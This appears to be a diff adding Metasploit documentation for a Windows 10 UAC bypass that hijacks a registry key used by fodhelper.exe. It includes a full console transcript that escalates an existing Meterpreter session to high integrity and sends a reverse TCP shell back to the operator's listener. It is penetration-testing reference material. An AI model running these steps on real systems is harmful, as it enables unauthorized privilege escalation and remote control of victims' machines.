|
| 1 | +## Intro |
| 2 | + |
| 3 | + This module will bypass Windows 10 UAC by hijacking a special key in the Registry under |
| 4 | + the current user hive, and inserting a custom command that will get invoked when |
| 5 | + the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC |
| 6 | + flag turned off. |
| 7 | + |
| 8 | + This module modifies a registry key, but cleans up the key once the payload has |
| 9 | + been invoked. |
| 10 | + |
| 11 | + The module does not require the architecture of the payload to match the OS. If |
| 12 | + specifying EXE::Custom your DLL should call ExitProcess() after starting your |
| 13 | + payload in a separate process. |
| 14 | + |
| 15 | +## Usage |
| 16 | + |
| 17 | + You'll first need to obtain a session on the target system. |
| 18 | + Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. |
| 19 | + |
| 20 | + |
| 21 | +##Scenario |
| 22 | + |
| 23 | + |
| 24 | +``` |
| 25 | +msf > |
| 26 | +[*] Sending stage (1189423 bytes) to 192.168.50.4 |
| 27 | +[*] Meterpreter session 11 opened (192.168.50.1:4444 -> 192.168.50.4:1654) at 2017-05-22 19:10:43 +0100 |
| 28 | +
|
| 29 | +msf > sessions -i 11 |
| 30 | +[*] Starting interaction with 11... |
| 31 | +
|
| 32 | +meterpreter > shell |
| 33 | +Process 9496 created. |
| 34 | +Channel 1 created. |
| 35 | +Microsoft Windows [Version 10.0.14393] |
| 36 | +(c) 2016 Microsoft Corporation. All rights reserved. |
| 37 | +
|
| 38 | +C:\Users\sasha\Desktop>whoami /all | findstr /C:"Mandatory Label" |
| 39 | +whoami /all | findstr /C:"Mandatory Label" |
| 40 | +Mandatory Label\Medium Mandatory Level Label S-1-16-8192 |
| 41 | +
|
| 42 | +C:\Users\sasha\Desktop>exit |
| 43 | +exit |
| 44 | +meterpreter > |
| 45 | +Background session 11? [y/N] |
| 46 | +msf > use exploit/windows/local/bypassuac_fodhelper |
| 47 | +msf exploit(bypassuac_fodhelper) > set SESSION 11 |
| 48 | +SESSION => 11 |
| 49 | +msf exploit(bypassuac_fodhelper) > show targets |
| 50 | +
|
| 51 | +Exploit targets: |
| 52 | +
|
| 53 | + Id Name |
| 54 | + -- ---- |
| 55 | + 0 Windows x86 |
| 56 | + 1 Windows x64 |
| 57 | +
|
| 58 | +
|
| 59 | +msf exploit(bypassuac_fodhelper) > set target 0 |
| 60 | +target => 0 |
| 61 | +msf exploit(bypassuac_fodhelper) > set payload windows/meterpreter/reverse_tcp |
| 62 | +payload => windows/meterpreter/reverse_tcp |
| 63 | +msf exploit(bypassuac_fodhelper) > run |
| 64 | +
|
| 65 | +[*] Started reverse TCP handler on 192.168.50.1:4445 |
| 66 | +[*] UAC is Enabled, checking level... |
| 67 | +[+] Part of Administrators group! Continuing... |
| 68 | +[+] UAC is set to Default |
| 69 | +[+] BypassUAC can bypass this setting, continuing... |
| 70 | +[*] Configuring payload and stager registry keys ... |
| 71 | +[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe |
| 72 | +[*] Sending stage (957487 bytes) to 192.168.50.4 |
| 73 | +[*] Meterpreter session 12 opened (192.168.50.1:4445 -> 192.168.50.4:1655) at 2017-05-22 19:12:03 +0100 |
| 74 | +[*] Cleaining up registry keys ... |
| 75 | +
|
| 76 | +meterpreter > shell |
| 77 | +Process 4076 created. |
| 78 | +Channel 1 created. |
| 79 | +Microsoft Windows [Version 10.0.14393] |
| 80 | +(c) 2016 Microsoft Corporation. All rights reserved. |
| 81 | +
|
| 82 | +C:\WINDOWS\system32>whoami /all | findstr /C:"Mandatory Label" |
| 83 | +whoami /all | findstr /C:"Mandatory Label" |
| 84 | +ERROR: Unable to get user claims information. |
| 85 | +Mandatory Label\High Mandatory Level Label S-1-16-12288 |
| 86 | +
|
| 87 | +C:\WINDOWS\system32> |
| 88 | +
|
| 89 | +``` |
0 commit comments